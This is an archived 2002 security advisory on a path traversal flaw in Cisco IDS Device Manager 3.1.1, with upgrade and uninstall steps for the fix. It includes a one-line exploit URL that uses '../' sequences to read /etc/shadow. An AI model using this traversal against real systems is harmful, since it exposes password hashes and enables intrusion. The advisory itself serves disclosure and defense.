TUCoPS :: Cisco :: cisc5399.htm

Cisco IDS Device Manager arbitrary file read access vulnerability
4th Jun 2002 [SBWID-5399]
COMMAND

	Cisco IDS Device Manager arbitrary file read access vulnerability

SYSTEMS AFFECTED

	Version 3.1.1

PROBLEM

	Andrew Lopacki [Andrew.Lopacki@amsouth.com] found a  bug  on  Cisco  IDS
	device manager, leading to arbitrary file read access.
	

	 Exploit

	 =======

	

	

	https://<sensor>/../../../../../etc/shadow 

	

	

SOLUTION

	Upgrade to version 3.1.2, downloadable from
	

	http://www.cisco.com/cgi-bin/tablebuild.pl/ids-appsens

	

	

	The name of the file is IDSk9-sp.3.1-2-S23.bin.
	

	Users that installed IDSk9-sp.3.1-1-S22.bin will need to uninstall  this
	service pack by typing the command
	

	#IDSk9-sp.3.1-1-S22.bin -U 

	

	before applying the new service pack.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH